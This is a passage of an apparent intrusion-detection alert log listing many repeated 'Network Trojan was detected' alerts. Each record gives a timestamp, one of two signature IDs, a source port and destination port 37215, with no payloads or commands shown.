            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961510
            SID:2829579
            Source Port:48230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755745
            SID:2835222
            Source Port:34272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905546
            SID:2829579
            Source Port:44932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739682
            SID:2835222
            Source Port:55150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.740817
            SID:2835222
            Source Port:46206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.901640
            SID:2829579
            Source Port:43582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842952
            SID:2835222
            Source Port:37164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899876
            SID:2835222
            Source Port:43944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014469
            SID:2835222
            Source Port:40682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.703199
            SID:2829579
            Source Port:47826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.934167
            SID:2835222
            Source Port:39278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738494
            SID:2835222
            Source Port:57906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.342136
            SID:2829579
            Source Port:50904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771177
            SID:2835222
            Source Port:59936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832618
            SID:2829579
            Source Port:60730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848299
            SID:2829579
            Source Port:44388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941813
            SID:2835222
            Source Port:44056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824504
            SID:2835222
            Source Port:58814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051091
            SID:2835222
            Source Port:35940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777814
            SID:2829579
            Source Port:53836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541369
            SID:2829579
            Source Port:39914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.221982
            SID:2829579
            Source Port:37196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865469
            SID:2835222
            Source Port:55426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.347365
            SID:2829579
            Source Port:45128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.652711
            SID:2829579
            Source Port:36606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055948
            SID:2835222
            Source Port:51532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774061
            SID:2835222
            Source Port:42390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.025902
            SID:2829579
            Source Port:49734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.481318
            SID:2835222
            Source Port:46200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.517542
            SID:2829579
            Source Port:44036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300103
            SID:2835222
            Source Port:45028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327726
            SID:2829579
            Source Port:57448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.809284
            SID:2835222
            Source Port:36282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067828
            SID:2829579
            Source Port:42734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827219
            SID:2829579
            Source Port:54436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299398
            SID:2829579
            Source Port:37696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289002
            SID:2835222
            Source Port:55000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.123723
            SID:2835222
            Source Port:51316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887392
            SID:2835222
            Source Port:39622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352248
            SID:2829579
            Source Port:48682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723727
            SID:2829579
            Source Port:33084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922954
            SID:2829579
            Source Port:54008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670420
            SID:2835222
            Source Port:46980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605017
            SID:2829579
            Source Port:43598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854063
            SID:2835222
            Source Port:46996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052903
            SID:2835222
            Source Port:60832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738687
            SID:2829579
            Source Port:41760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752368
            SID:2835222
            Source Port:33800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770754
            SID:2835222
            Source Port:43580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789886
            SID:2829579
            Source Port:35922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926532
            SID:2829579
            Source Port:53648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905100
            SID:2829579
            Source Port:54156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881841
            SID:2835222
            Source Port:37400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811531
            SID:2835222
            Source Port:45364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811258
            SID:2835222
            Source Port:51458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059898
            SID:2829579
            Source Port:45670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299997
            SID:2835222
            Source Port:46556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995642
            SID:2829579
            Source Port:35362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955936
            SID:2829579
            Source Port:57174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.999088
            SID:2835222
            Source Port:58970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537113
            SID:2835222
            Source Port:39866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298800
            SID:2835222
            Source Port:44052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.409468
            SID:2835222
            Source Port:32794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597145
            SID:2829579
            Source Port:59014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635068
            SID:2835222
            Source Port:34880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.823759
            SID:2835222
            Source Port:51662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936847
            SID:2829579
            Source Port:60930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875237
            SID:2835222
            Source Port:41474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873588
            SID:2835222
            Source Port:59888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878770
            SID:2829579
            Source Port:45436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918737
            SID:2829579
            Source Port:52042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495170
            SID:2829579
            Source Port:48902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048209
            SID:2829579
            Source Port:45052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.486096
            SID:2829579
            Source Port:43498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605645
            SID:2835222
            Source Port:60728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565890
            SID:2835222
            Source Port:38966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500246
            SID:2829579
            Source Port:39118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470787
            SID:2835222
            Source Port:53792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808769
            SID:2829579
            Source Port:45296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670269
            SID:2829579
            Source Port:52630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045907
            SID:2835222
            Source Port:36016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065125
            SID:2829579
            Source Port:50730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550304
            SID:2829579
            Source Port:38050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916632
            SID:2835222
            Source Port:35944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040394
            SID:2835222
            Source Port:58408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508207
            SID:2835222
            Source Port:37746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553194
            SID:2835222
            Source Port:41910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877743
            SID:2829579
            Source Port:49494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.554735
            SID:2829579
            Source Port:60498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990066
            SID:2829579
            Source Port:53944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995196
            SID:2829579
            Source Port:40678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733416
            SID:2829579
            Source Port:34852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775897
            SID:2835222
            Source Port:39326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028873
            SID:2835222
            Source Port:41872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334125
            SID:2829579
            Source Port:40390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433574
            SID:2829579
            Source Port:46620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299390
            SID:2835222
            Source Port:58174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804584
            SID:2835222
            Source Port:38330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852962
            SID:2829579
            Source Port:37024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414333
            SID:2835222
            Source Port:54610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532578
            SID:2835222
            Source Port:49770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809042
            SID:2835222
            Source Port:42458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398072
            SID:2835222
            Source Port:42326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732679
            SID:2829579
            Source Port:35774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895420
            SID:2835222
            Source Port:58146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.041164
            SID:2835222
            Source Port:55200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997957
            SID:2835222
            Source Port:43586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804709
            SID:2829579
            Source Port:52518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733776
            SID:2829579
            Source Port:51972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556561
            SID:2835222
            Source Port:44356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.964247
            SID:2835222
            Source Port:46306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817737
            SID:2835222
            Source Port:41702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824284
            SID:2829579
            Source Port:39242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542687
            SID:2829579
            Source Port:54422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943361
            SID:2835222
            Source Port:36506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012297
            SID:2829579
            Source Port:53882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825188
            SID:2829579
            Source Port:55940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754994
            SID:2835222
            Source Port:59736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320542
            SID:2829579
            Source Port:45194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605396
            SID:2835222
            Source Port:41696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431029
            SID:2829579
            Source Port:56660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525784
            SID:2835222
            Source Port:46900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.904024
            SID:2829579
            Source Port:42772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313082
            SID:2835222
            Source Port:39208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676732
            SID:2829579
            Source Port:52296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047791
            SID:2835222
            Source Port:52812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299961
            SID:2829579
            Source Port:52334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862086
            SID:2829579
            Source Port:58732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424098
            SID:2829579
            Source Port:37226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680192
            SID:2829579
            Source Port:47720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952743
            SID:2835222
            Source Port:60604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675289
            SID:2835222
            Source Port:56680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880137
            SID:2829579
            Source Port:58648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.475522
            SID:2829579
            Source Port:47600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741717
            SID:2829579
            Source Port:60700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622239
            SID:2829579
            Source Port:51794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879747
            SID:2835222
            Source Port:55064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723447
            SID:2835222
            Source Port:55934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766733
            SID:2829579
            Source Port:47152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303824
            SID:2835222
            Source Port:55620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745117
            SID:2835222
            Source Port:49366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500294
            SID:2829579
            Source Port:59288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899259
            SID:2829579
            Source Port:49680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432763
            SID:2829579
            Source Port:53986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847682
            SID:2835222
            Source Port:58530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772249
            SID:2829579
            Source Port:39468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376005
            SID:2835222
            Source Port:57246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.016356
            SID:2835222
            Source Port:42558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993368
            SID:2835222
            Source Port:44116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810489
            SID:2835222
            Source Port:41264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735943
            SID:2829579
            Source Port:57644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753317
            SID:2835222
            Source Port:39722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770791
            SID:2835222
            Source Port:54214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765281
            SID:2829579
            Source Port:54962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581739
            SID:2835222
            Source Port:53726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955411
            SID:2829579
            Source Port:45688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948867
            SID:2829579
            Source Port:41140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988772
            SID:2835222
            Source Port:54942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743851
            SID:2835222
            Source Port:36066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855155
            SID:2829579
            Source Port:34150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793351
            SID:2835222
            Source Port:39828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990276
            SID:2835222
            Source Port:47364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350430
            SID:2835222
            Source Port:55092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869772
            SID:2835222
            Source Port:46358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919406
            SID:2835222
            Source Port:53994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919547
            SID:2835222
            Source Port:44636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918829
            SID:2835222
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774550
            SID:2835222
            Source Port:48292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508133
            SID:2835222
            Source Port:49822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277137
            SID:2829579
            Source Port:60024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811457
            SID:2829579
            Source Port:58344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861197
            SID:2829579
            Source Port:49102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922043
            SID:2829579
            Source Port:60490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994868
            SID:2835222
            Source Port:44640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321377
            SID:2835222
            Source Port:47604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.546154
            SID:2829579
            Source Port:43586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767278
            SID:2829579
            Source Port:34790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605299
            SID:2835222
            Source Port:38772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.677463
            SID:2829579
            Source Port:54216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505552
            SID:2829579
            Source Port:42038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290854
            SID:2835222
            Source Port:36660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358754
            SID:2829579
            Source Port:59398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.524504
            SID:2835222
            Source Port:36604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.775011
            SID:2829579
            Source Port:32976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691596
            SID:2835222
            Source Port:38510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.970276
            SID:2829579
            Source Port:34178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806399
            SID:2835222
            Source Port:39398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989717
            SID:2829579
            Source Port:42334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486889
            SID:2835222
            Source Port:36124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941092
            SID:2829579
            Source Port:50994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736566
            SID:2835222
            Source Port:39376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916564
            SID:2829579
            Source Port:47108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582216
            SID:2835222
            Source Port:57272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.585694
            SID:2829579
            Source Port:47410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.395200
            SID:2829579
            Source Port:43636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622390
            SID:2835222
            Source Port:56018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.663892
            SID:2829579
            Source Port:57106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
